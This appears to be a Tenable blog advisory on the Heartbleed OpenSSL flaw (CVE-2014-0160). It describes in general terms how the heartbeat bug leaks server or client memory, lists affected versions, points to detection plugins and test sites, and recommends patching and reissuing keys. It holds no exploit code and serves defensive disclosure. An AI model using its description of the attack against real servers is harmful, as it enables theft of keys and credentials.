Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Beware of Bleeding Hearts (Updated)

Note: Passive Vulnerability Scanner (PVS) is now Nessus Network Monitor. To learn more about this application and its latest capabilities, visit the Nessus Network Monitor web page.

A recently discovered vulnerability, identified as Common Vulnerabilities and Exposures (CVE) CVE-2014-0160, but more commonly called HeartBleed Vulnerability, has been acknowledged by the Open SSL Organization and the Finnish Cert Team. This is an attack against the transport layer security protocol (TLS/DTLS) hearbeat extension. When it is exploited it leads to the leak of memory contents from the server to the client and from the client to the server.

This vulnerability is pretty serious in that it is transparent to the administrators, as there is no log of the attack. When an attack is carried out, the attacker can perform a memory dump of the target machine, 64 kilobytes at a time. Fortunately the attacker doesn’t get to choose which 64k they will get, but they can make multiple attacks at a time, collecting the entire memory. The attacker can directly contact the vulnerable service or attack any user connecting to a malicious service.

One of the discovering agencies, Codenomicon Defensics posted in an F.A.Q. that some of the information they were able to obtain when testing were "secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business critical documents and communication."

This bug was introduced to OpenSSL in December 2011 and has been out since OpenSSL release 1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.

Unlike the recent “goto fail” vulnerability in OS X, and the similar one in GnuTLS, this is not a man-in-the-middle attack. However, once this attack is used and the SSL keys are obtained, the attack can result in a man-in-the-middle attack.

There are several websites devoted to detailed analysis, such as https://heartbleed.com, and to testing the servers for the vulnerability such as http://filippo.io/Heartbleed/, while security vendors are working hard to set up honeypots and tools to detect these threats.

Tenable released such detection on the 8th of April: http://www.tenable.com/plugins/index.php?view=single&id=73412. This plugin can test HTTPS (and everything direct SSL, really) but also IMAP, LDAP, NNTP, POP, SMTP, XMPP and more. Tenable also released a plugin for its Passive Vulnerability Scanner (PVS): http://www.tenable.com/8194.html. This plugin checks if the remote web server is running an instance of OpenSSL that may be affected by an information disclosure vulnerability. The Nessus plugin is a local patch checking plugins for just about every Linux OS out there which check for this vulnerability safely and accurately, and the PVS plugin detects this by sniffing the network.

The only fix for this is to update the OpenSSL package to version 1.0.1g. It is also recommended once you are patched, if you suspect you were attacked and had leakage, to revoke your SSL key, and reissue new keys. This is the safest way to ensure your certificates can remain trusted.

Subscribe to the Tenable Blog

Subscribe
Try for Free Buy Now

Try Tenable.io

FREE FOR 60 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Sign up now.

Buy Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

$2,275.00

Buy Now

Try for Free Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, email, community and chat support 24 hours a day, 365 days a year. Full details here.

Try for Free Buy Now

Try Tenable.io Web Application Scanning

FREE FOR 60 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578.00

Buy Now

Try for Free Contact Sales

Try Tenable.io Container Security

FREE FOR 60 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Learn More about Industrial Security

Get a Demo of Tenable.sc

Please fill out the form below with your contact information and a sales representative will contact you shortly to schedule a demo. You may also include a short comment (limited to 255 characters). Please note that fields with asterisks (*) are mandatory.